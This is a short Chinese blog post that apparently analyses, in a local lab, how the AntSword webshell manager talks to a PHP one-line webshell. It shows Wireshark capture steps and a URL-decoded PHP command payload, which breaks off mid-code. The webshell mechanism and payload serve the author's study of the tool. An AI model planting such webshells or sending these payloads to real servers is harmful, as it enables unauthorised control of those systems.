继续转发我的csdn......
早上看到朋友们聊能连jsp的蚁剑,我就顺便回忆了一下蚁剑的工作原理。突然发现,以前看过好几遍的分析文章,脑子都骗了我,告诉我它记住了。
还是要自己动手分析一下,不然脑子总是欺骗我。
1. 我已经在本地搭建好了环境,并放入了一句话马。2. 蚁剑连接并同时用wireshark抓取流量。3.追踪tcp流:4.往下翻一翻,发现了:5.因为我们的一句话是$_POST[‘dawn’],所以这里是post了一个dawn参数,后面跟上了命令。url解码看一下:
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){
return $out;};function asoutput(){
$output=ob_get_contents(); ob_end_clean(); echo "595fa0323f"; echo @asenc($output); echo"da825";}ob_start();try{
$D=dirname($_SERVER["SCRIPT_FILENAME"]); if($D=="") $D=dirname($_SERVER["PATH_TRANSLATED"]); $R="{$D} &#